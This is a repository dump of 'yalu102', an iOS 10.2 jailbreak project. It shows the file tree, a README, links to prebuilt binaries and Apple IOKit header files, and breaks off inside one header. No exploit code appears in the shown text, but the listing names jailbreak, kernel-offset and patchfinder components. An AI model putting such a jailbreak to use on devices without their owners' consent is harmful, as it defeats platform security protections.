├── .gitignore ├── Impactor_0.9.38.dmg ├── Impactor_For_Windows.zip ├── README.md ├── SourceCode ├── Headers │ └── IOKit │ │ ├── IOKitKeys.h │ │ ├── IOKitLib.h │ │ ├── IOReturn.h │ │ ├── IOTypes.h │ │ ├── OSMessageNotification.h │ │ └── iokitmig.h ├── yalu102.xcodeproj │ ├── project.pbxproj │ └── project.xcworkspace │ │ └── contents.xcworkspacedata └── yalu102 │ ├── 0.reload.plist │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── AppIcon40x40@2x~ipad-1.png │ │ ├── AppIcon40x40@2x~ipad.png │ │ ├── AppIcon40x40@2x~ipadnotif.png │ │ ├── AppIcon40x40@2x~ipadsptl-1.png │ │ ├── AppIcon40x40@2x~ipadsptl.png │ │ ├── AppIcon40x40@2x~ipadsptl3.png │ │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ │ ├── AppIcon40x40@3x~iphone.png │ │ ├── AppIcon40x40~ipad-1.png │ │ ├── AppIcon40x40~ipad-2.png │ │ ├── AppIcon40x40~ipad.png │ │ ├── AppIcon60x60.png │ │ ├── AppIcon60x60@2x.png │ │ ├── AppIcon60x60@2x~ipad.png │ │ ├── AppIcon60x60@2x~ipadpro.png │ │ ├── AppIcon60x60@3x.png │ │ ├── AppIcon60x60~ipad.png │ │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── IOKit.tbd │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── bootstrap.tar │ ├── devicesupport.h │ ├── devicesupport.m │ ├── iokitmig64.o │ ├── jailbreak.m │ ├── launchctl │ ├── main.m │ ├── offsets.c │ ├── offsets.h │ ├── patchfinder64.h │ ├── patchfinder64.o │ ├── pte_stuff.h │ ├── reload │ └── tar ├── yalu102.app ├── 0.reload.plist ├── AppIcon20x20@2x.png ├── AppIcon20x20@2x~ipad.png ├── AppIcon20x20@3x.png ├── AppIcon20x20~ipad.png ├── AppIcon29x29@2x.png ├── AppIcon29x29@2x~ipad.png ├── AppIcon29x29@3x.png ├── AppIcon29x29~ipad.png ├── AppIcon40x40@2x.png ├── AppIcon40x40@2x~ipad.png ├── AppIcon40x40@3x.png ├── AppIcon40x40~ipad.png ├── AppIcon60x60@2x.png ├── AppIcon60x60@3x.png ├── AppIcon76x76@2x~ipad.png ├── AppIcon76x76~ipad.png ├── AppIcon83.5x83.5@2x~ipad.png ├── Base.lproj │ ├── LaunchScreen.storyboardc │ │ ├── 01J-lp-oVM-view-Ze5-6b-2t3.nib │ │ ├── Info.plist │ │ └── UIViewController-01J-lp-oVM.nib │ └── Main.storyboardc │ │ ├── BYZ-38-t0r-view-8bC-Xf-vdC.nib │ │ ├── Info.plist │ │ └── UIViewController-BYZ-38-t0r.nib ├── Info.plist ├── PkgInfo ├── _CodeSignature │ └── CodeResources ├── bootstrap.tar ├── embedded.mobileprovision ├── launchctl ├── reload ├── tar └── yalu102 └── yalu102.ipa /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /Impactor_0.9.38.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/Impactor_0.9.38.dmg -------------------------------------------------------------------------------- /Impactor_For_Windows.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/Impactor_For_Windows.zip -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | incomplete iOS 10.2 jailbreak for 64 bit devices by qwertyoruiopz and marcograssi 4 | 5 | add header support and ipa file by @SparkZheng 6 | 7 | 8 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOKitKeys.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * Common symbol definitions for IOKit. 32 | * 33 | * HISTORY 34 | * 35 | */ 36 | 37 | 38 | #ifndef _IOKIT_IOKITKEYS_H 39 | #define _IOKIT_IOKITKEYS_H 40 | 41 | // properties found in the registry root 42 | #define kIOKitBuildVersionKey "IOKitBuildVersion" 43 | #define kIOKitDiagnosticsKey "IOKitDiagnostics" 44 | // a dictionary keyed by plane name 45 | #define kIORegistryPlanesKey "IORegistryPlanes" 46 | #define kIOCatalogueKey "IOCatalogue" 47 | 48 | // registry plane names 49 | #define kIOServicePlane "IOService" 50 | #define kIOPowerPlane "IOPower" 51 | #define kIODeviceTreePlane "IODeviceTree" 52 | #define kIOAudioPlane "IOAudio" 53 | #define kIOFireWirePlane "IOFireWire" 54 | #define kIOUSBPlane "IOUSB" 55 | 56 | // registry ID number 57 | #define kIORegistryEntryIDKey "IORegistryEntryID" 58 | 59 | // IOService class name 60 | #define kIOServiceClass "IOService" 61 | 62 | // IOResources class name 63 | #define kIOResourcesClass "IOResources" 64 | 65 | // IOService driver probing property names 66 | #define kIOClassKey "IOClass" 67 | #define kIOProbeScoreKey "IOProbeScore" 68 | #define kIOKitDebugKey "IOKitDebug" 69 | 70 | // IOService matching property names 71 | #define kIOProviderClassKey "IOProviderClass" 72 | #define kIONameMatchKey "IONameMatch" 73 | #define kIOPropertyMatchKey "IOPropertyMatch" 74 | #define kIOPathMatchKey "IOPathMatch" 75 | #define kIOLocationMatchKey "IOLocationMatch" 76 | #define kIOParentMatchKey "IOParentMatch" 77 | #define kIOResourceMatchKey "IOResourceMatch" 78 | #define kIOMatchedServiceCountKey "IOMatchedServiceCountMatch" 79 | 80 | #define kIONameMatchedKey "IONameMatched" 81 | 82 | #define kIOMatchCategoryKey "IOMatchCategory" 83 | #define kIODefaultMatchCategoryKey "IODefaultMatchCategory" 84 | 85 | // IOService default user client class, for loadable user clients 86 | #define kIOUserClientClassKey "IOUserClientClass" 87 | 88 | // key to find IOMappers 89 | #define kIOMapperIDKey "IOMapperID" 90 | 91 | #define kIOUserClientCrossEndianKey "IOUserClientCrossEndian" 92 | #define kIOUserClientCrossEndianCompatibleKey "IOUserClientCrossEndianCompatible" 93 | #define kIOUserClientSharedInstanceKey "IOUserClientSharedInstance" 94 | // diagnostic string describing the creating task 95 | #define kIOUserClientCreatorKey "IOUserClientCreator" 96 | 97 | // IOService notification types 98 | #define kIOPublishNotification "IOServicePublish" 99 | #define kIOFirstPublishNotification "IOServiceFirstPublish" 100 | #define kIOMatchedNotification "IOServiceMatched" 101 | #define kIOFirstMatchNotification "IOServiceFirstMatch" 102 | #define kIOTerminatedNotification "IOServiceTerminate" 103 | 104 | // IOService interest notification types 105 | #define kIOGeneralInterest "IOGeneralInterest" 106 | #define kIOBusyInterest "IOBusyInterest" 107 | #define kIOAppPowerStateInterest "IOAppPowerStateInterest" 108 | #define kIOPriorityPowerStateInterest "IOPriorityPowerStateInterest" 109 | 110 | #define kIOPlatformDeviceMessageKey "IOPlatformDeviceMessage" 111 | 112 | // IOService interest notification types 113 | #define kIOCFPlugInTypesKey "IOCFPlugInTypes" 114 | 115 | // properties found in services that implement command pooling 116 | #define kIOCommandPoolSizeKey "IOCommandPoolSize" // (OSNumber) 117 | 118 | // properties found in services that implement priority 119 | #define kIOMaximumPriorityCountKey "IOMaximumPriorityCount" // (OSNumber) 120 | 121 | // properties found in services that have transfer constraints 122 | #define kIOMaximumBlockCountReadKey "IOMaximumBlockCountRead" // (OSNumber) 123 | #define kIOMaximumBlockCountWriteKey "IOMaximumBlockCountWrite" // (OSNumber) 124 | #define kIOMaximumByteCountReadKey "IOMaximumByteCountRead" // (OSNumber) 125 | #define kIOMaximumByteCountWriteKey "IOMaximumByteCountWrite" // (OSNumber) 126 | #define kIOMaximumSegmentCountReadKey "IOMaximumSegmentCountRead" // (OSNumber) 127 | #define kIOMaximumSegmentCountWriteKey "IOMaximumSegmentCountWrite" // (OSNumber) 128 | #define kIOMaximumSegmentByteCountReadKey "IOMaximumSegmentByteCountRead" // (OSNumber) 129 | #define kIOMaximumSegmentByteCountWriteKey "IOMaximumSegmentByteCountWrite" // (OSNumber) 130 | #define kIOMinimumSegmentAlignmentByteCountKey "IOMinimumSegmentAlignmentByteCount" // (OSNumber) 131 | #define kIOMaximumSegmentAddressableBitCountKey "IOMaximumSegmentAddressableBitCount" // (OSNumber) 132 | 133 | // properties found in services that wish to describe an icon 134 | // 135 | // IOIcon = 136 | // { 137 | // CFBundleIdentifier = "com.example.driver.example"; 138 | // IOBundleResourceFile = "example.icns"; 139 | // }; 140 | // 141 | // where IOBundleResourceFile is the filename of the resource 142 | 143 | #define kIOIconKey "IOIcon" // (OSDictionary) 144 | #define kIOBundleResourceFileKey "IOBundleResourceFile" // (OSString) 145 | 146 | #define kIOBusBadgeKey "IOBusBadge" // (OSDictionary) 147 | #define kIODeviceIconKey "IODeviceIcon" // (OSDictionary) 148 | 149 | // property of root that describes the machine's serial number as a string 150 | #define kIOPlatformSerialNumberKey "IOPlatformSerialNumber" // (OSString) 151 | 152 | // property of root that describes the machine's UUID as a string 153 | #define kIOPlatformUUIDKey "IOPlatformUUID" // (OSString) 154 | 155 | // IODTNVRAM property keys 156 | #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY" 157 | #define kIONVRAMSyncNowPropertyKey "IONVRAM-SYNCNOW-PROPERTY" 158 | #define kIONVRAMActivateCSRConfigPropertyKey "IONVRAM-ARMCSR-PROPERTY" 159 | #define kIODTNVRAMPanicInfoKey "aapl,panic-info" 160 | 161 | // keys for complex boot information 162 | #define kIOBootDeviceKey "IOBootDevice" // dict | array of dicts 163 | #define kIOBootDevicePathKey "IOBootDevicePath" // arch-neutral OSString 164 | #define kIOBootDeviceSizeKey "IOBootDeviceSize" // OSNumber of bytes 165 | 166 | // keys for OS Version information 167 | #define kOSBuildVersionKey "OS Build Version" 168 | 169 | #endif /* ! _IOKIT_IOKITKEYS_H */ 170 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOReturn.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * HISTORY 30 | */ 31 | 32 | /* 33 | * Core IOReturn values. Others may be family defined. 34 | */ 35 | 36 | #ifndef __IOKIT_IORETURN_H 37 | #define __IOKIT_IORETURN_H 38 | 39 | #ifdef __cplusplus 40 | extern "C" { 41 | #endif 42 | 43 | #include 44 | 45 | typedef kern_return_t IOReturn; 46 | 47 | #ifndef sys_iokit 48 | #define sys_iokit err_system(0x38) 49 | #endif /* sys_iokit */ 50 | #define sub_iokit_common err_sub(0) 51 | #define sub_iokit_usb err_sub(1) 52 | #define sub_iokit_firewire err_sub(2) 53 | #define sub_iokit_block_storage err_sub(4) 54 | #define sub_iokit_graphics err_sub(5) 55 | #define sub_iokit_networking err_sub(6) 56 | #define sub_iokit_bluetooth err_sub(8) 57 | #define sub_iokit_pmu err_sub(9) 58 | #define sub_iokit_acpi err_sub(10) 59 | #define sub_iokit_smbus err_sub(11) 60 | #define sub_iokit_ahci err_sub(12) 61 | #define sub_iokit_powermanagement err_sub(13) 62 | #define sub_iokit_hidsystem err_sub(14) 63 | #define sub_iokit_scsi err_sub(16) 64 | #define sub_iokit_usbaudio err_sub(17) 65 | //#define sub_iokit_pccard err_sub(21) 66 | #define sub_iokit_thunderbolt err_sub(29) 67 | #define sub_iokit_platform err_sub(0x2A) 68 | #define sub_iokit_audio_video err_sub(0x45) 69 | #define sub_iokit_baseband err_sub(0x80) 70 | #define sub_iokit_HDA err_sub(254) 71 | #define sub_iokit_hsic err_sub(0x147) 72 | #define sub_iokit_sdio err_sub(0x174) 73 | #define sub_iokit_wlan err_sub(0x208) 74 | 75 | #define sub_iokit_vendor_specific err_sub(-2) 76 | #define sub_iokit_reserved err_sub(-1) 77 | 78 | #define iokit_common_err(return) (sys_iokit|sub_iokit_common|return) 79 | #define iokit_family_err(sub,return) (sys_iokit|sub|return) 80 | #define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return) 81 | 82 | #define kIOReturnSuccess KERN_SUCCESS // OK 83 | #define kIOReturnError iokit_common_err(0x2bc) // general error 84 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory 85 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage 86 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC 87 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device 88 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation 89 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument 90 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked 91 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked 92 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and 93 | // device already open 94 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages 95 | // had different msg_id 96 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function 97 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure 98 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error 99 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error 100 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ??? 101 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock 102 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open 103 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported 104 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported 105 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error 106 | #define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error 107 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open 108 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure 109 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure 110 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy 111 | #define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout 112 | #define kIOReturnOffline iokit_common_err(0x2d7) // device offline 113 | #define kIOReturnNotReady iokit_common_err(0x2d8) // not ready 114 | #define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached 115 | #define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left 116 | #define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data 117 | //#define kIOReturn???Error iokit_common_err(0x2dc) // ??? 118 | #define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists 119 | #define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down 120 | // physical memory 121 | #define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached 122 | #define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued 123 | #define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received 124 | // on interrupt port 125 | #define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted 126 | #define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device 127 | #define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present 128 | #define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted 129 | #define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode 130 | #define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun 131 | #define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun 132 | #define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly! 133 | #define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required 134 | #define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted 135 | #define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded 136 | #define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding 137 | #define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past! 138 | #define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future 139 | #define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found 140 | #define kIOReturnInvalid iokit_common_err(0x1) // should never be seen 141 | 142 | #ifdef __cplusplus 143 | } 144 | #endif 145 | 146 | #endif /* ! __IOKIT_IORETURN_H */ 147 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOTypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | #ifndef __IOKIT_IOTYPES_H 29 | #define __IOKIT_IOTYPES_H 30 | 31 | #ifndef IOKIT 32 | #define IOKIT 1 33 | #endif /* !IOKIT */ 34 | 35 | #include 36 | #include 37 | 38 | #include "IOKit/IOReturn.h" 39 | 40 | #ifdef __cplusplus 41 | extern "C" { 42 | #endif 43 | 44 | #ifndef NULL 45 | #if defined (__cplusplus) 46 | #define NULL 0 47 | #else 48 | #define NULL ((void *)0) 49 | #endif 50 | #endif 51 | 52 | /* 53 | * Simple data types. 54 | */ 55 | #include 56 | //#include 57 | 58 | 59 | typedef UInt32 IOOptionBits; 60 | typedef SInt32 IOFixed; 61 | typedef UInt32 IOVersion; 62 | typedef UInt32 IOItemCount; 63 | typedef UInt32 IOCacheMode; 64 | 65 | typedef UInt32 IOByteCount32; 66 | typedef UInt64 IOByteCount64; 67 | 68 | typedef UInt32 IOPhysicalAddress32; 69 | typedef UInt64 IOPhysicalAddress64; 70 | typedef UInt32 IOPhysicalLength32; 71 | typedef UInt64 IOPhysicalLength64; 72 | 73 | #if !defined(__arm__) && !defined(__i386__) 74 | typedef mach_vm_address_t IOVirtualAddress; 75 | #else 76 | typedef vm_address_t IOVirtualAddress; 77 | #endif 78 | 79 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) 80 | typedef IOByteCount64 IOByteCount; 81 | #else 82 | typedef IOByteCount32 IOByteCount; 83 | #endif 84 | 85 | typedef IOVirtualAddress IOLogicalAddress; 86 | 87 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) 88 | 89 | typedef IOPhysicalAddress64 IOPhysicalAddress; 90 | typedef IOPhysicalLength64 IOPhysicalLength; 91 | #define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32)) 92 | #define IOPhysSize 64 93 | 94 | #else 95 | 96 | typedef IOPhysicalAddress32 IOPhysicalAddress; 97 | typedef IOPhysicalLength32 IOPhysicalLength; 98 | #define IOPhysical32( hi, lo ) (lo) 99 | #define IOPhysSize 32 100 | 101 | #endif 102 | 103 | 104 | typedef struct 105 | { 106 | IOPhysicalAddress address; 107 | IOByteCount length; 108 | } IOPhysicalRange; 109 | 110 | typedef struct 111 | { 112 | IOVirtualAddress address; 113 | IOByteCount length; 114 | } IOVirtualRange; 115 | 116 | #if !defined(__arm__) && !defined(__i386__) 117 | typedef IOVirtualRange IOAddressRange; 118 | #else 119 | typedef struct 120 | { 121 | mach_vm_address_t address; 122 | mach_vm_size_t length; 123 | } IOAddressRange; 124 | #endif 125 | 126 | /* 127 | * Map between #defined or enum'd constants and text description. 128 | */ 129 | typedef struct { 130 | int value; 131 | const char *name; 132 | } IONamedValue; 133 | 134 | 135 | /* 136 | * Memory alignment -- specified as a power of two. 137 | */ 138 | typedef unsigned int IOAlignment; 139 | 140 | #define IO_NULL_VM_TASK ((vm_task_t)0) 141 | 142 | 143 | /* 144 | * Pull in machine specific stuff. 145 | */ 146 | 147 | //#include 148 | 149 | #ifndef MACH_KERNEL 150 | 151 | #ifndef __IOKIT_PORTS_DEFINED__ 152 | #define __IOKIT_PORTS_DEFINED__ 153 | typedef mach_port_t io_object_t; 154 | #endif /* __IOKIT_PORTS_DEFINED__ */ 155 | 156 | #include 157 | 158 | typedef io_object_t io_connect_t; 159 | typedef io_object_t io_enumerator_t; 160 | typedef io_object_t io_iterator_t; 161 | typedef io_object_t io_registry_entry_t; 162 | typedef io_object_t io_service_t; 163 | 164 | #define IO_OBJECT_NULL ((io_object_t) 0) 165 | 166 | #endif /* MACH_KERNEL */ 167 | 168 | // IOConnectMapMemory memoryTypes 169 | enum { 170 | kIODefaultMemoryType = 0 171 | }; 172 | 173 | enum { 174 | kIODefaultCache = 0, 175 | kIOInhibitCache = 1, 176 | kIOWriteThruCache = 2, 177 | kIOCopybackCache = 3, 178 | kIOWriteCombineCache = 4, 179 | kIOCopybackInnerCache = 5 180 | }; 181 | 182 | // IOMemory mapping options 183 | enum { 184 | kIOMapAnywhere = 0x00000001, 185 | 186 | kIOMapCacheMask = 0x00000700, 187 | kIOMapCacheShift = 8, 188 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift, 189 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift, 190 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift, 191 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 192 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 193 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift, 194 | 195 | kIOMapUserOptionsMask = 0x00000fff, 196 | 197 | kIOMapReadOnly = 0x00001000, 198 | 199 | kIOMapStatic = 0x01000000, 200 | kIOMapReference = 0x02000000, 201 | kIOMapUnique = 0x04000000, 202 | kIOMapPrefault = 0x10000000, 203 | kIOMapOverwrite = 0x20000000 204 | }; 205 | 206 | /*! @enum Scale Factors 207 | @discussion Used when a scale_factor parameter is required to define a unit of time. 208 | @constant kNanosecondScale Scale factor for nanosecond based times. 209 | @constant kMicrosecondScale Scale factor for microsecond based times. 210 | @constant kMillisecondScale Scale factor for millisecond based times. 211 | @constant kTickScale Scale factor for the standard (100Hz) tick. 212 | @constant kSecondScale Scale factor for second based times. */ 213 | 214 | enum { 215 | kNanosecondScale = 1, 216 | kMicrosecondScale = 1000, 217 | kMillisecondScale = 1000 * 1000, 218 | kSecondScale = 1000 * 1000 * 1000, 219 | kTickScale = (kSecondScale / 100) 220 | }; 221 | 222 | enum { 223 | kIOConnectMethodVarOutputSize = -3 224 | }; 225 | 226 | /* compatibility types */ 227 | 228 | 229 | typedef unsigned int IODeviceNumber; 230 | 231 | 232 | #ifdef __cplusplus 233 | } 234 | #endif 235 | 236 | #endif /* ! __IOKIT_IOTYPES_H */ 237 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * HISTORY 32 | * 33 | */ 34 | 35 | #ifndef __OS_OSMESSAGENOTIFICATION_H 36 | #define __OS_OSMESSAGENOTIFICATION_H 37 | 38 | #ifdef __cplusplus 39 | extern "C" { 40 | #endif 41 | 42 | #include 43 | #include 44 | #include "IOKit/IOReturn.h" 45 | 46 | enum { 47 | kFirstIOKitNotificationType = 100, 48 | kIOServicePublishNotificationType = 100, 49 | kIOServiceMatchedNotificationType = 101, 50 | kIOServiceTerminatedNotificationType = 102, 51 | kIOAsyncCompletionNotificationType = 150, 52 | kIOServiceMessageNotificationType = 160, 53 | kLastIOKitNotificationType = 199, 54 | 55 | // reserved bits 56 | kIOKitNoticationTypeMask = 0x00000FFF, 57 | kIOKitNoticationTypeSizeAdjShift = 30, 58 | kIOKitNoticationMsgSizeMask = 3, 59 | }; 60 | 61 | enum { 62 | kOSNotificationMessageID = 53, 63 | kOSAsyncCompleteMessageID = 57, 64 | kMaxAsyncArgs = 16 65 | }; 66 | 67 | enum { 68 | kIOAsyncReservedIndex = 0, 69 | kIOAsyncReservedCount, 70 | 71 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount, 72 | kIOAsyncCalloutRefconIndex, 73 | kIOAsyncCalloutCount, 74 | 75 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount, 76 | kIOMatchingCalloutRefconIndex, 77 | kIOMatchingCalloutCount, 78 | 79 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount, 80 | kIOInterestCalloutRefconIndex, 81 | kIOInterestCalloutServiceIndex, 82 | kIOInterestCalloutCount 83 | }; 84 | 85 | 86 | 